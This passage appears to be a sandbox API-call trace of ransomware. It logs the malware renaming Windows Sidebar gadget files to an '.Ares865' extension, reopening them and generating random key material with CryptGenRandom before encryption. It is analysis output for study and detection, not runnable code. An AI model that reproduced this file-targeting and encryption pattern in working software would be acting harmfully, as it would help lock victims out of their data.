param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.Ares865") returned 97 [0118.374] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.ares865"), dwFlags=0x1) returned 1 [0118.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.376] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3383) returned 1 [0118.376] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.376] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.376] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.379] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.380] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.380] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.380] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.Ares865") returned 95 [0118.380] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png.ares865"), dwFlags=0x1) returned 1 [0118.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.382] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3300) returned 1 [0118.382] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.383] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.383] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.385] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.386] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.386] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.386] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US" [0118.387] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html.Ares865") returned 100 [0118.387] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html.ares865"), dwFlags=0x1) returned 1 [0118.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3436) returned 1 [0118.388] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.389] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.389] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.392] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.392] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.392] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.393] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html.Ares865") returned 95 [0118.393] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html.ares865"), dwFlags=0x1) returned 1 [0118.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.394] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5482) returned 1 [0118.394] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.395] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.395] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.397] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.398] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.398] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.399] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js" [0118.399] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js.Ares865") returned 101 [0118.399] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js.ares865"), dwFlags=0x1) returned 1 [0118.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.401] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=47778) returned 1 [0118.401] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.402] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.402] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.407] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.407] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.407] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.408] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\settings.js.Ares865") returned 96 [0118.409] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\settings.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\settings.js.ares865"), dwFlags=0x1) returned 1 [0118.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\settings.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.410] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9854) returned 1 [0118.410] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.411] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.411] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.414] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.414] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.414] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.415] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css" [0118.415] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css.Ares865") returned 103 [0118.415] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\picturepuzzle.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\picturepuzzle.css.ares865"), dwFlags=0x1) returned 1 [0118.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\picturepuzzle.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.418] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4466) returned 1 [0118.418] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.418] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.419] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.424] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.425] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.425] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.425] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\settings.css.Ares865") returned 98 [0118.425] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\settings.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\settings.css.ares865"), dwFlags=0x1) returned 1 [0118.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\settings.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.427] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5204) returned 1 [0118.427] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.428] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.428] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.431] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.432] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.432] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.433] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget" [0118.433] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.Ares865") returned 79 [0118.433] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0118.435] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.436] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16491) returned 1 [0118.436] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.436] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.436] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.440] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.440] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.440] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.441] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.Ares865") returned 79 [0118.441] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0118.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.443] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6889) returned 1 [0118.443] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.443] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.443] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.449] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.450] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.450] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.450] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.Ares865") returned 79 [0118.450] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0118.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.453] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5930) returned 1 [0118.453] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.454] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.454] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.457] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.458] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.458] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.458] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images" [0118.459] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.Ares865") returned 93 [0118.459] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png.ares865"), dwFlags=0x1) returned 1 [0118.461] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.461] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12585) returned 1 [0118.461] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.462] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.462] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.465] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.465] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.465] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.466] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.Ares865") returned 90 [0118.466] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png.ares865"), dwFlags=0x1) returned 1 [0118.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 